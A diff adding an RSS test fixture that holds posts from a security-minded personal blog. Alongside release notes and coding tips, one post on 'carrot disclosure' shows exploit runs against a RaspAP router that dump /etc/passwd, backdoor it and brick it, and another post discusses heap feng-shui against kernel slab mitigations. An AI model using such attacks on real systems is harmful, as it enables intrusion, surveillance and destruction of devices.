+version <code>0.9.0</code>, codename "Babar the Elephant",
+named the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
+The main new feature is the PHP8.3 support, but there are a couple of
+quality-of-life improvements for people using Snuffleupagus with fuzzers as
+well.</p>
+<h3>Changelog</h3>
+<ul>
+<li>Compatibility with PHP8.3</li>
+<li>Add <code>sp.log_max_len</code> to limit the maximum size of the log messages</li>
+<li>Add an example configuration for Xenforo 2.2.12 </li>
+<li>Url encode functions arguments when logging them</li>
+<li>Fix a possible NULL-byte truncation when outputting parameters in the logs</li>
+<li>Make <code>readonly_exec</code> play nice on readonly filesystems </li>
+</ul>
+<p>As usual, if you want to help, we have some
+<a href="https://github.com/jvoisin/snuffleupagus/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22">low hanging fruits</a> ♥</p>
+<p>See you in your PHP stack!</p>Some notes on "Randomized slab caches for kmalloc()"2023-09-11T01:45:00+02:002023-09-11T01:45:00+02:00jvoisintag:dustri.org,2023-09-11:/b/some-notes-on-randomized-slab-caches-for-kmalloc.html<p>Ruiqi Gong and Xiu Jianfeng got their
+<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
+patch series merged upstream, and I've had enough discussions about it to
+warrant summarising them into a small blogpost.</p>
+<p>The main idea is to have multiple slab caches, and pick one at random based on
+the address of …</p><p>Ruiqi Gong and Xiu Jianfeng got their
+<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
+patch series merged upstream, and I've had enough discussions about it to
+warrant summarising them into a small blogpost.</p>
+<p>The main idea is to have multiple slab caches, and pick one at random based on
+the address of code calling <code>kmalloc()</code> and a per-boot seed, to make heap-spraying harder.
+It's a great idea, but comes with some shortcomings for now:</p>
+<ul>
+<li>Objects being allocated via wrappers around <code>kmalloc()</code>, like <code>sock_kmalloc</code>,
+ <code>f2fs_kmalloc</code>, <code>aligned_kmalloc</code>, … will end up in the same slab cache.</li>
+<li>The slabs needs to be pinned, otherwise an attacker could <a href="https://en.wikipedia.org/wiki/Heap_feng_shui">feng-shui</a> their way
+ into having the whole slab free'ed, garbage-collected, and have a slab for
+ another type allocated at the same VA. <a href="https://thejh.net/">Jann Horn</a> and <a href="https://infosec.exchange/@nspace">Matteo Rizzo</a> have a <a href="https://github.com/torvalds/linux/compare/master...thejh:linux:slub-virtual-upstream">nice
+ set of patches</a>,
+ discussed a bit in <a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">this Project Zero blogpost</a>,
+ for a feature called <a href="https://github.com/torvalds/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e"><code>SLAB_VIRTUAL</code></a>,
+ implementing precisely this.</li>
+<li>There are 16 slabs by default, so one chance out of 16 to end up in the same
+ slab cache as the target.</li>
+<li>There are no guard pages between caches, so inter-caches overflows are
+ possible.</li>
+<li>As pointed by <a href="https://twitter.com/andreyknvl/status/1700267669336080678">andreyknvl</a>
+ and <a href="https://infosec.exchange/@minipli/111045336853055793">minipli</a>,
+ the fewer allocations hitting a given cache means less noise,
+ so it might even help with some heap feng-shui.</li>
+<li>minipli also pointed that "randomized caches still freely
+ mix kernel allocations with user controlled ones (<code>xattr</code>, <code>keyctl</code>, <code>msg_msg</code>, …).
+ So even though merging is disabled for these caches, i.e. no direct overlap
+ with <code>cred_jar</code> etc., other object types can still be targeted (<code>struct
+ pipe_buffer</code>, BPF maps, its verifier state objects,…). It’s just a matter of
+ probing which allocation index the targeted object falls into.",
+ but I considered this out of scope, since it's much more involved;
+ albeit something like Jann Horn's <a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README"><code>CONFIG_KMALLOC_SPLIT_VARSIZE</code></a>
+ wouldn't significantly increase complexity.</li>
+</ul>
+<p>Also, while code addresses as a source of entropy has historically be a great
+way to provide <a href="https://lwn.net/Articles/569635/">KASLR</a> bypasses, <code>hash_64(caller ^
+random_kmalloc_seed, ilog2(RANDOM_KMALLOC_CACHES_NR + 1))</code> shouldn't trivially
+leak offsets.</p>
+<p>The segregation technique is a bit like a weaker version of grsecurity's
+<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">AUTOSLAB</a>,
+or a weaker kernel-land version of
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>,
+but to be fair, making use-after-free exploitation harder, and significantly
+harder once pinning lands, with only ~150 lines of code and negligible
+performance impact is amazing and should be praised. Moreover, I wouldn't be
+surprised if this was backported in <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's KernelCTF</a>
+soon, so we should see if my analysis is correct.</p>Making use of pygments' filters with Pelican2023-09-01T18:30:00+02:002023-09-01T18:30:00+02:00jvoisintag:dustri.org,2023-09-01:/b/making-use-of-pygments-filters-with-pelican.html<p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
+more or less since the beginning of this blog and I'm still
+pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
+it is, and its complete absence of fundamental changes thorough the years.</p>
+<p>Anyway, I was looking at how to reduce the size of the pages …</p><p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
+more or less since the beginning of this blog and I'm still
+pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
+it is, and its complete absence of fundamental changes thorough the years.</p>
+<p>Anyway, I was looking at how to reduce the size of the pages of my blog
+and looked at how code is syntactically highlighted:
+Pelican is using <a href="https://pygments.org">Pygments</a> to do this,
+and looking at its documentation, the <a href="https://pygments.org/docs/filters/#TokenMergeFilter">TokenMergeFilter</a>
+should help a bit, by merging token of the same type together,
+instead of highlighting them separately.</p>
+<p>Pelican's documentation <a href="https://docs.getpelican.com/en/stable/settings.html">says</a>
+that options can be passed to python-markdown like this:
+<code>MARKDOWN = { 'extension_configs': { 'markdown.extensions.codehilite': {'css_class': 'highlight'} } }</code>.</p>
+<p>Looking at <a href="https://python-markdown.github.io/">python-markdown</a>'s <a href="https://python-markdown.github.io/reference/#markdown">one</a>,
+one can pass various things as parameters, but it doesn't mention filters.
+<a href="https://pygments.org/docs/filters/">Pygments documentation on this topic</a> implies
+that the only way to add filters is to use the <code>add_filter</code> method on a lexer.</p>
+<p>But <a href="https://github.com/pygments/pygments/blob/master/pygments/lexer.py">looking at the code</a>
+as suggested <a href="https://github.com/Python-Markdown/markdown/issues/1322#issuecomment-1453911760">here</a>,
+filters can be passed like any other options, meaning that one only needs to
+add the following code into the <code>pelicanconf.py</code> file to used the
+<code>TokenMergeFilter</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">pelican</span> <span class="kn">import</span> <span class="n">TokenMergeFilter</span>
+
+<span class="n">MARKDOWN</span> <span class="o">=</span> <span class="p">{</span>
+ <span class="s1">'extension_configs'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'markdown.extensions.codehilite'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'filters'</span><span class="p">:</span> <span class="p">[</span><span class="n">TokenMergeFilter</span><span class="p">()]</span>
+ <span class="p">}</span>
+ <span class="p">}</span>
+<span class="p">}</span><span class="err">`</span><span class="o">.</span>
+</code></pre></div>
+
+<p>Totally worth the effort for a marginal page size reduction!</p>Book review: Hacks, Leaks, and Revelations2023-08-16T16:15:00+02:002023-08-16T16:15:00+02:00jvoisintag:dustri.org,2023-08-16:/b/book-review-hacks-leaks-and-revelations.html<p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
+<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
+telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
+by <a href="https://micahflee.com/">Micah Lee</a>
+was available in <em>early access</em>, and that they'd be happy to send me an ebook
+copy …</p><p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
+<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
+telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
+by <a href="https://micahflee.com/">Micah Lee</a>
+was available in <em>early access</em>, and that they'd be happy to send me an ebook
+copy free of charge!</p>
+<p>From the couple of interactions I had with him, Lee is not only a great human being,
+but also technically literate. He's the director of information security
+at <a href="https://theintercept.com/staff/micah-lee/">The Intercept</a>, and the person
+behind <a href="https://onionshare.org/">OnionShare</a> and <a href="https://dangerzone.rocks/">DangerZone</a>;
+so I was thrilled to finally get my hands on his book!</p>
+<p>And what a great one it is! It's a complete course for everyone who want to learn how to properly deal with and report on large data sets like leaks:
+How to communicate with sources along with some notions of <a href="https://en.wikipedia.org/wiki/Operations_security">opsec</a>,
+some words on the ethics of dealing with this kind of data,
+how to get data leaks and how to analyse them
+properly and safely, wrangling tools like
+<a href="https://github.com/freedomofpress/dangerzone">dangerzone</a>,
+a <a href="https://en.wikipedia.org/wiki/BitTorrent">BitTorrent</a> client,
+<a href="https://signal.org">Signal</a>,
+<a href="https://torproject.org">Tor</a> via the <a href="https://www.torproject.org/download/">Tor Browser</a> and
+<a href="https://onionshare.org/">Onionshare</a>,
+some <a href="https://en.wikipedia.org/wiki/Linux">linux</a> and <a href="https://en.wikipedia.org/wiki/Shell_(computing)">shell</a> basics,
+a crash course into data analysis with <a href="https://python.org">Python</a> and <a href="https://en.wikipedia.org/wiki/SQL">SQL</a>,
+the <a href="https://occrp.org/en">OCCRP</a>'s <a href="https://docs.aleph.occrp.org/">Aleph</a>,
+…
+with hands-on exercises and reporting examples based on real leaks like
+<a href="https://en.wikipedia.org/wiki/2021_Epik_data_breach">EpikFail</a>,
+<a href="https://en.wikipedia.org/wiki/BlueLeaks">BlueLeaks</a>,
+the <a href="https://apnews.com/article/oath-keepers-leaked-membership-rolls-2ca4195ed3a10e45dd189bf98f3e5a26">Oath Keepers leak</a>,
+<a href="https://discordleaks.unicornriot.ninja/discord/">Unicorn Riot's DiscordLeaks</a>,
+<a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">AFLDS</a>,
+he <a href="https://www.databreaches.net/heritage-foundation-wasnt-attacked-they-leaked-their-own-data/">Heritage Foundation emails</a>,
+…</p>
+<p>It's a comprehensive yet highly digestible resource that I would wholeheartedly
+recommend to anyone remotely interested by modern journalism practises. Hacked
+and dumped databases are all around the internet, waiting to be analysed, reported on,
+contextualised and exposed, and with this book, anyone could help with
+the effort of making the world a better place: sunlight is the best
+disinfectant!</p>mat2 0.13.42023-08-02T21:30:00+02:002023-08-02T21:30:00+02:00jvoisintag:dustri.org,2023-08-02:/b/mat2-0134.html<p>There is a new minor version of mat2:
+<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
+changes, only minor improvements, code modernisation and a bit of hardening:</p>
+<ul>
+<li>Add documentation about mat2 on OSX</li>
+<li>Make use of python3.7 constructs to simplify code</li>
+<li>Use moderner type annotations</li>
+<li>Harden <code>get_meta</code> in archive.py against …</li></ul><p>There is a new minor version of mat2:
+<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
+changes, only minor improvements, code modernisation and a bit of hardening:</p>
+<ul>
+<li>Add documentation about mat2 on OSX</li>
+<li>Make use of python3.7 constructs to simplify code</li>
+<li>Use moderner type annotations</li>
+<li>Harden <code>get_meta</code> in archive.py against variants of <a href="https://cve.circl.lu/cve/CVE-2022-35410">CVE-2021-35410</a></li>
+<li>Improve MSOffice document support</li>
+<li>Package the manpage on PyPI.</li>
+</ul>
+<p>Thanks to <a href="https://anelki.net/">akierig</a>, mat2 is now <a href="https://github.com/macports/macports-ports/pull/18072">available</a> in <a href="https://trac.macports.org/">macports</a>!</p>
+<p>As usual, if you know some python help is
+<a href="https://0xacab.org/jvoisin/mat2/issues?label_name%5B%5D=good+first+issue">welcome</a>.</p>A sneaky Golang bug2023-08-02T13:15:00+02:002023-08-02T13:15:00+02:00jvoisintag:dustri.org,2023-08-02:/b/a-sneaky-golang-bug.html<p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
+duplicates from a slice, and thus wrote something like this using the
+<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
+<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
+<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Can you spot the bug? Here are the …</p><p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
+duplicates from a slice, and thus wrote something like this using the
+<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
+<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
+<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Can you spot the bug? Here are the prototypes of the two functions:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">SortFunc</span><span class="p">[</span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">x</span><span class="w"> </span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span>
+<span class="kd">func</span><span class="w"> </span><span class="nx">CompactFunc</span><span class="p">[</span><span class="nx">S</span><span class="w"> </span><span class="o">~</span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">s</span><span class="w"> </span><span class="nx">S</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span><span class="w"> </span><span class="nx">S</span>
+</code></pre></div>
+
+<p>The first has no return value, while the second does, unused in our case, hence
+the bug. It's <em>interesting</em> to note that the go compiler is perfectly happy
+with this, and doesn't issue any warning: it was <em>extraordinarily fun</em> to pinpoint.</p>
+<p>I reached out to <a href="https://airs.com/ian/">Ian Lance Taylor</a> who
+<a href="https://cs.opensource.google/go/x/exp/+/03df57b9a50843fbf23bf90375d6584bcc8ea13d">implemented</a>
+those functions in 2021 and he pointed me to <a href="https://go.dev/blog/slices-intro">Go Slices: usage and internals
+</a>. Things indeed do become obvious once
+looking at the <a href="https://github.com/golang/go/blob/master/src/runtime/slice.go">implementation of
+<code>slice</code></a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">type</span><span class="w"> </span><span class="nx">slice</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">array</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span>
+<span class="w"> </span><span class="nx">len</span><span class="w"> </span><span class="kt">int</span>
+<span class="w"> </span><span class="nx">cap</span><span class="w"> </span><span class="kt">int</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Both <code>slices.SortFunc</code> and <code>slices.CompactFunc</code> are taking a slice as
+parameter, and not a pointer to a slice, meaning that any changes to <code>len</code> and
+<code>cap</code> will be local to the function.</p>
+<p>Anyway, There is a <a href="https://github.com/golang/go/issues/20803">proposal</a> to require
+return values to be explicitly used or ignored open since 2017, but it didn't
+go anywhere for now. There is also <a href="https://github.com/golang/go/issues/20148">another proposal</a>
+to make <code>go vet</code> better at highlighting error mishandling, as well as <a href="https://github.com/kisielk/errcheck">errcheck</a>,
+but those wouldn't really help in this case.</p>
\ No newline at end of file
diff --git a/internal/reader/parser/testdata/large_rss.xml b/internal/reader/parser/testdata/large_rss.xml
new file mode 100644
index 00000000..53cec06f
--- /dev/null
+++ b/internal/reader/parser/testdata/large_rss.xml
@@ -0,0 +1,1472 @@
+
+Artificial truthhttps://dustri.org/b/Sun, 10 Mar 2024 17:15:00 +0100Using vale with vimhttps://dustri.org/b/using-vale-with-vim.html<p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
+(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
+<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goal
+of this little corner on the internet was to improve my English, a purpose it
+keeps serving. Adding some lightweight tooling to my text editor to push this
+goal even further sounds great.</p>
+<p>Like all good software, vale <a href="https://gitlab.alpinelinux.org/alpine/aports/-/tree/master/testing/vale">is
+packaged</a>
+in Alpine, although it looked a tad neglected, so I sent <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/61919">a
+pull-request</a>
+to get it updated.
+Its configuration is pretty straightforward: a <code>~/.vale.ini</code> file, with
+where to store/read its data and some preferences. It comes with a
+<a href="https://vale.sh/hub/">couple of <em>packages</em></a> for popular styles, like the ones
+from <a href="https://vale.sh/hub/microsoft/">Microsoft</a>,
+<a href="https://vale.sh/hub/google/">Google</a>, <a href="https://vale.sh/hub/redhat/">RedHat</a>, … then a simple <code>vale sync</code> to force it to
+download and store the data, and you're good to go.</p>
+<p>While <code>vale</code> can be called from the command line, integration with my text
+editor is way more comfy. I'm sure there are a ton of plugins to integrate it
+with vim, but I'm not a huge fan of having my text editor run arbitrary code
+from the internet, so I threw the following 6 lines in <a href="https://dustri.org/pub/vimrc">my vimrc</a> instead:</p>
+<div class="codehilite"><pre><span></span><code><span class="nv">augroup</span><span class="w"> </span><span class="nv">vale</span>
+<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nv">filereadable</span><span class="ss">(</span><span class="nv">expand</span><span class="ss">(</span><span class="s2">"~/.vale.ini"</span><span class="ss">))</span>
+<span class="w"> </span><span class="nv">autocmd</span><span class="w"> </span><span class="nv">FileType</span><span class="w"> </span><span class="nv">markdown</span><span class="w"> </span><span class="nv">setlocal</span><span class="w"> </span><span class="nv">makeprg</span><span class="o">=</span><span class="nv">vale</span>\<span class="w"> </span><span class="o">--</span><span class="nv">output</span><span class="o">=</span><span class="nv">line</span>\<span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="nv">errorformat</span><span class="o">=%</span><span class="nv">f</span>:<span class="o">%</span><span class="nv">l</span>:<span class="o">%</span><span class="nv">c</span>:<span class="o">%</span><span class="nv">o</span>:<span class="o">%</span><span class="nv">m</span>
+<span class="w"> </span><span class="nv">nnoremap</span><span class="w"> </span><span class="o"><</span><span class="nv">Leader</span><span class="o">></span><span class="nv">M</span><span class="w"> </span>:<span class="nv">make</span><span class="o"><</span><span class="nv">CR</span><span class="o">><</span><span class="nv">CR</span><span class="o">></span>
+<span class="w"> </span><span class="k">end</span>
+<span class="nv">augroup</span><span class="w"> </span><span class="k">end</span>
+</code></pre></div>
+
+<p>It checks if I have a <code>~/vale.ini</code> file, and if so sets
+<a href="https://vimhelp.org/options.txt.html#%27makeprg%27"><code>makeprg</code></a> to vale, and
+configure <a href="https://vimhelp.org/quickfix.txt.html#errorformat"><code>errorformat</code></a> to
+properly parse vale's output. Now every time I type <code><Leader> M</code>, I get vale's
+diagnostics in my <a href="https://vimhelp.org/quickfix.txt.html">quickfix window</a>.</p>
+<p>The next steps would likely be to <s>waste</s> spend some time improving the theme
+of the aforementioned window, add some ad hoc rules to vale, and maybe try to
+show the diagnostics inline like the spellechecker is doing.</p>jvoisinSun, 10 Mar 2024 17:15:00 +0100tag:dustri.org,2024-03-10:/b/using-vale-with-vim.htmlsysadminCarrot disclosurehttps://dustri.org/b/carrot-disclosure.html<p>Once you have found a vulnerability, you can either sit on it, or disclose it.
+There are usually two ways to disclose, with minor variations:</p>
+<ol>
+<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
+ where one gives time to the vendor to issue a fix before disclosing</li>
+<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
+ where one discloses immediately without notifying anyone before.</li>
+</ol>
+<p>I would like to coin a 3<sup>rd</sup> one: <em>Carrot Disclosure</em>, dangling a
+<a href="https://en.wikipedia.org/wiki/Carrot_and_stick">metaphorical carrot</a> in front
+of the vendor to incentivise change. The main idea is to only publish the
+(redacted) output of the exploit for a critical vulnerability, to showcase that the
+software is exploitable. Now the vendor has two choices: either perform a
+holistic audit of its software, fixing as many issues as possible in the hope
+of fixing the showcased vulnerability; or losing users who might not be happy
+running a known-vulnerable software. Users of this disclosure model are of
+course called Bugs Bunnies.</p>
+<p>We all looked at catastrophic web applications, finding a ton
+of bugs, and deciding not to bother with reporting them, because they were too
+many of them, because we knew that there will be more of them lurking, because
+the vendor is a complete tool and it would take more time trying to properly
+disclose things than it took finding the vulnerabilities, … This is an
+excellent use case for Carrot Disclosure! Of course, for unauditably-large
+codebases, it doesn't work: you've got a Linux LPE, who cares.</p>
+<p>Interestingly, it shifts the work balance a bit: it's usually harder to write
+an exploit than it's to fix here. But here, the vendor has to audit and fix
+its entire codebase, for the ~low cost of one (1) exploit, that you don't even
+have to publish if you don't want to.</p>
+<p>If you want to be extra-nice, you can:</p>
+<ul>
+<li>Publish the SHA256 of the exploit, to prove
+ that you weren't making things up, once it's fixed or if you get sued for
+ whatever frivolous reasons like libel.</li>
+<li>Maintain the exploits against new versions, proving that the exploit is still
+ working.</li>
+<li>Publish the exploit once it has been fixed, otherwise you risk to have
+ vendors call your bluff next time, or at least notify that the issue has been
+ fixed. Since you don't have hardcoded offsets because we're in 2024, you can even
+ put this in a continuous integration.</li>
+</ul>
+<p>Let's have an example, as a treat. A couple of shitty vulnerabilities for
+<a href="https://raspap.com/">RaspAP</a> that took me 5 minutes to find and at least 5
+more to write an exploit for each of them:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp">$ </span>./read-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">5</span>
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Dumping /etc/passwd</span>
+<span class="go">root:x:0:0:root:/root:/bin/bash</span>
+<span class="go">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
+<span class="go">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
+<span class="gp">$ </span>./authed-mitm-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] default login/password in use</span>
+<span class="go">[+] backdooring system…</span>
+<span class="go">[+] system backdoored, enjoy your permanent MITM!</span>
+<span class="gp">$ </span>./brick-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Bricking the system…</span>
+<span class="go">[+] System bricked!</span>
+<span class="gp">$</span>
+</code></pre></div>
+
+<p>It looks like there is a low-hanging unauthenticated arbitrary code execution
+chainable with a privilege escalation to root as well, but since writing an
+exploit would take more than 5 minutes, I can't be bothered, and odds are that
+it'll be fixed along with the persistent denial-of-service anyway. Let me know
+when you think those are fixed.</p>jvoisinFri, 08 Mar 2024 21:30:00 +0100tag:dustri.org,2024-03-08:/b/carrot-disclosure.htmlsecurityYoutube video embedding harm reductionhttps://dustri.org/b/youtube-video-embedding-harm-reduction.html<p>Embedding external content on a website in the current enshittocene period is
+more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
+video while reducing its tracking and nuisance capabilities as much as possible:</p>
+<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">iframe</span>
+ <span class="na">credentialless</span>
+ <span class="na">allowfullscreen</span>
+ <span class="na">referrerpolicy</span><span class="o">=</span><span class="s">"no-referrer"</span>
+ <span class="na">sandbox</span><span class="o">=</span><span class="s">"allow-scripts allow-same-origin"</span>
+ <span class="na">allow</span><span class="o">=</span><span class="s">"accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; bluetooth 'none'; browsing-topics 'none'; camera 'none'; ch-ua 'none'; display-capture 'none'; domain-agent 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; gamepad 'none'; geolocation 'none'; gyroscope 'none'; hid 'none'; identity-credentials-get 'none'; idle-detection 'none'; keyboard-map 'none'; local-fonts 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; otp-credentials 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-create 'none'; publickey-credentials-get 'none'; screen-wake-lock 'none'; serial 'none'; speaker-selection 'none'; sync-xhr 'none'; usb 'none'; web-share 'none'; window-management 'none'; xr-spatial-tracking 'none'"</span><span class="err">,</span>
+ <span class="na">csp</span><span class="o">=</span><span class="s">"sandbox allow-scripts allow-same-origin;"</span>
+ <span class="na">width</span><span class="o">=</span><span class="s">"560"</span>
+ <span class="na">height</span><span class="o">=</span><span class="s">"315"</span>
+ <span class="na">src</span><span class="o">=</span><span class="s">"https://www.youtube-nocookie.com/embed/jfKfPfyJRdk"</span>
+ <span class="na">title</span><span class="o">=</span><span class="s">"lofi hip hop radio 📚 - beats to relax/study to"</span>
+ <span class="na">frameborder</span><span class="o">=</span><span class="s">"0"</span>
+ <span class="na">loading</span><span class="o">=</span><span class="s">"lazy"</span>
+<span class="p">></</span><span class="nt">iframe</span><span class="p">></span>
+</code></pre></div>
+
+<ul>
+<li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/IFrame_credentialless"><code>credentialless</code></a> to load youtube in a blank disposable context,
+ without access to the origin's network, cookies, and storage data.</li>
+<li><code>allowfullscreen</code> because some people like it</li>
+<li><code>referrerpolicy</code> set to not leak your <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer">referer</a></li>
+<li><code>sandbox</code> to only allow javascript execution and SOP. Downloads, forms,
+ modals, screen orientation, pointer lock, popups, presentation session,
+ <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage_Access_API">storage access</a> and thus third-party cookies,
+ top-navigation, … are all denied.</li>
+<li><code>allow</code> with <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">every single directives</a>
+ set to "absolutely-fucking-not", and yes, they have to be all set one by one,
+ and check regularly is new directive were added,
+ because there is <a href="https://github.com/w3c/webappsec-permissions-policy/issues/208">no deny-all</a>
+ in the <a href="https://w3c.github.io/webappsec-permissions-policy/">spec</a>. It seems
+ that every browser has its own list of directives, chrome is using <a href="https://github.com/w3c/webappsec-permissions-policy/blob/main/features.md">this one</a>
+ while firefox' prefers the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">MDN one</a>,
+ and of course the two differ. No doubt this was designed with privacy, simplicity, maintainability and security in mind.</li>
+<li><code>src</code> set to <code>www.youtube-nocookie.com</code> instead of <code>youtube.com</code>. Both
+ are official Google urls, but the former doesn't do tracking via cookies,
+ and disables API and interaction and interaction logging. Amusingly, it's
+ the player used on <code>whitehouse.gov</code>.</li>
+<li><code>csp</code> set to <code>sandbox allow-scripts allow-same-origin;</code> for compatibility's
+ sake, just in case.
+ I'd love to use a more restrictive policy, but the spec doesn't allow to
+ provide one, except if the embedded website explicitly allows it, and of
+ course youtube doesn't.</li>
+<li><code>loading="lazy"</code> in case people don't scroll far enough to see the video, no
+ need to make them do queries to Google for no reasons.</li>
+</ul>
